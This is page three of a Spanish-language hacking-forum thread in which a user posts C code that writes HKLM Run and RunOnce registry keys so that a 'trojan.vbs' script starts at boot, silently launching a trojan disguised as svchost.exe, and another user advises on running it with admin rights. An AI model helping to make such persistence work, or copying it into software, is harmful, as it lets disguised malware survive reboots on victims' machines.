elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  Microsoft visual studio 2012
0 Usuarios y 2 Visitantes están viendo este tema.
Páginas: 1 2 [3] Ir Abajo Respuesta Imprimir
Autor Tema: Microsoft visual studio 2012  (Leído 10,718 veces)
kub0x
Enlightenment Seeker
Colaborador
***
Desconectado Desconectado

Mensajes: 1.486


S3C M4NI4C


Ver Perfil
Re:
« Respuesta #20 en: 27 Septiembre 2014, 21:07 pm »

Buenas,

esto lo sufri yo hace tiempo. En que clave lo has registrado? Deberias de hacerlo en HKLM.

Saludos.


En línea

Viejos siempre viejos,
Ellos tienen el poder,
Y la juventud,
¡En el ataúd! Criaturas Al poder.

Visita mi perfil en ResearchGate

Kaxperday


Desconectado Desconectado

Mensajes: 702


The man in the Middle


Ver Perfil WWW
Re: Microsoft visual studio 2012
« Respuesta #21 en: 27 Septiembre 2014, 23:53 pm »

Vaya me alegra que sepas a lo que me refiero xD, pues tengo esto:

Código
  1. int regKey,regOpen;
  2. char *path="C:\\Windows\\directorio\\trojan.vbs";
  3. HKEY hkey;
  4. regOpen=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
  5. if(regOpen==1)
  6.    {
  7.        printf("La clave ya esta creada\n");system("pause");
  8.    }
  9. else
  10. {
  11. regKey=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
  12. if(regKey==0)
  13. {
  14. RegSetValueEx((HKEY)hkey,"AutoRunVBS",0,REG_SZ,(BYTE*)path,strlen(path));
  15. printf("Hemos creado la clave");
  16. system("pause");
  17. }
  18. else
  19.        {
  20.            printf("No se pudo crear la clave en el registro\n");
  21.            system("pause");
  22.        }
  23. }
  24.  
  25.  

No se como va eso, ¿dónde debería de meter lo de HKLM para que me funcione? O al menos intentarlo, muchas gracias por la ayuda.


En línea

Cuando el poder económico parasita al político ningún partido ni dictador podrá liberarnos de él. Se reserva el 99% ese poder.
kub0x
Enlightenment Seeker
Colaborador
***
Desconectado Desconectado

Mensajes: 1.486


S3C M4NI4C


Ver Perfil
Re: Microsoft visual studio 2012
« Respuesta #22 en: 28 Septiembre 2014, 00:06 am »

En este post pregunté lo mismo que tú. Básicamente, como ejecutar una aplicación en el inicio en modo admin (via manifest).

http://foro.elhacker.net/windows/win7_ejecutar_aplicacion_con_derechos_de_administrador_desde_el_registro-t360123.0.html
En línea

Viejos siempre viejos,
Ellos tienen el poder,
Y la juventud,
¡En el ataúd! Criaturas Al poder.

Visita mi perfil en ResearchGate

Kaxperday


Desconectado Desconectado

Mensajes: 702


The man in the Middle


Ver Perfil WWW
Re: Microsoft visual studio 2012
« Respuesta #23 en: 28 Septiembre 2014, 00:20 am »

Vaya lo he estado leyendo hasta ahora, y la verdad la única diferencia que veo es que tu clave al final tiene "RunOnce" y la mia "Run", no se si será eso, pero es la primera diferencia de la que me percaté, lo pruebo y te comento.

De todas formas, es una cosa rara mi caso, ya que yo anclo al inicop un .vbs que me ejecutará en silencio el programa que tiene provilegios. Probando...

Edito: Vaya parece que no me funcionó, probé con esto:

Código
  1. int regKey,regOpen;
  2. char *path="C:\\Windows\\directorio\\trojan.vbs";
  3. HKEY hkey;
  4. regOpen=RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce",&hkey);
  5. if(regOpen==1)
  6.    {
  7.        printf("La clave ya esta creada\n");system("pause");
  8.    }
  9. else
  10. {
  11. regKey=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce",&hkey);
  12. if(regKey==0)
  13. {
  14. RegSetValueEx((HKEY)hkey,"AutoRunVBS",0,REG_SZ,(BYTE*)path,strlen(path));
  15. printf("Hemos creado la clave");
  16. system("pause");
  17. }
  18. else
  19.        {
  20.            printf("No se pudo crear la clave en el registro\n");
  21.            system("pause");
  22.        }
  23. }
  24.  
  25.  

Me dice que ha creado la clave reinició pero no se ejecuta el programa, no se que puede ser, según ví tu clave era igual que la mía entonces no entiendo por qué. Además los archivos siguen con necesitando el permiso del administrador para usarse TODOS, no solo el .exe me pregunto porqué será quizás sea porque están dentro del directorio de windows o no sé.

Destacar que el troyano se llama svchost.exe quizás influya ya que hay otro con el mismo nombre, pero no creo que sea ese el problema.

También he probado con esto:

Código
  1. HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

Y me dice que no se pudo crear clave en el registro, vaya :(

Saludos
« Última modificación: 28 Septiembre 2014, 00:47 am por Kaxperday » En línea

Cuando el poder económico parasita al político ningún partido ni dictador podrá liberarnos de él. Se reserva el 99% ese poder.
Páginas: 1 2 [3] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Visual Studio 2012 - Editor de código
Programación C/C++
ricardo2013 2 3,492 Último mensaje 8 Febrero 2013, 04:09 am
por Swicher
Visual studio 2012 y Avast de los co*****. « 1 2 »
.NET (C#, VB.NET, ASP)
xustyx 12 9,322 Último mensaje 18 Diciembre 2012, 22:22 pm
por xustyx
Implementar qt en visual studio 2012
Programación C/C++
patilanz 2 2,283 Último mensaje 24 Febrero 2014, 23:23 pm
por patilanz
[AYUDA] SQL Server en Visual Studio 2013 Ultimate
.NET (C#, VB.NET, ASP)
DarK_FirefoX 3 5,703 Último mensaje 20 Noviembre 2014, 06:47 am
por El Benjo
[Duda] Pasando programa de C compilado en GCC a Visual Studio 2012
Programación C/C++
mokaNordic 6 3,417 Último mensaje 12 Diciembre 2014, 14:01 pm
por Eternal Idol
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines